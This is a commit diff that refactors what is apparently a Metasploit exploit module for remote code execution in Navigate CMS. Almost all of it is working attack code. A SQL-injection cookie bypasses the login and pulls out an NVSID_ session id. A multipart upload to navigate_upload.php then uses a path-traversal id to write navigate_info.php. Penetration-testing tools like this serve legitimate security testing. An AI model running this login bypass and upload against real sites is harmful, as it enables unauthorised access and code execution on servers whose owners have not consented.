Refactor again

2018-09-27 12:38:05 +02:00 · 2018-09-27 12:38:05 +02:00 · 342cfe4199
parent 82b1f40925
commit 342cfe4199
1 changed files with 21 additions and 16 deletions
--- a/modules/exploits/multi/http/navigate_cms_rce.rb
+++ b/modules/exploits/multi/http/navigate_cms_rce.rb
@ -51,18 +51,29 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def login_bypass
-    send_request_cgi(
-      'method' => 'POST',
-      'cookie' => 'navigate-user=\" OR TRUE--%20',
+    check_resp = send_request_cgi(
+      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/login.php')
    )
+
+    login_bypass_resp = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/login.php'),
+      'cookie' => 'navigate-user=\" OR TRUE--%20'
+    )
+
+    if login_bypass_resp &&
+       login_bypass_resp.code == 302 &&
+       check_resp.body.include?('Navigate CMS')
+      session_id = login_bypass_resp.get_cookies_parsed
+                                    .values.select { |v| v.to_s =~ /NVSID_/ }
+                                    .first.first
+      return session_id
+    end
  end

  def check
-    check = login_bypass
-
-    if check &&
-       check.code == 302
+    if login_bypass
      return CheckCode::Vulnerable
    end

@ -70,14 +81,9 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def exploit
-    init = login_bypass
+    session_id = login_bypass

-    fail_with(Failure::Unreachable, 'Unable to reach target') unless init
-
-    session_id = init.get_cookies_parsed
-                     .values.select { |v| v.to_s =~ /NVSID_/ }.first.first
-
-    if init.code == 302 && session_id
+    if session_id
      print_good('Login bypass successful')
    else
      fail_with(Failure::NoAccess, 'Login bypass failed')
@ -91,13 +97,12 @@ class MetasploitModule < Msf::Exploit::Remote

    upload = send_request_cgi(
      'method' => 'POST',
-      'cookie' => init.get_cookies,
+      'uri' => normalize_uri(target_uri.path, '/navigate_upload.php'),
      'vars_get' => Hash[{
        'session_id' => session_id,
        'engine' => 'picnik',
        'id' => '../../../navigate_info.php'
      }.to_a.shuffle],
-      'uri' => normalize_uri(target_uri.path, '/navigate_upload.php'),
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => data_post
    )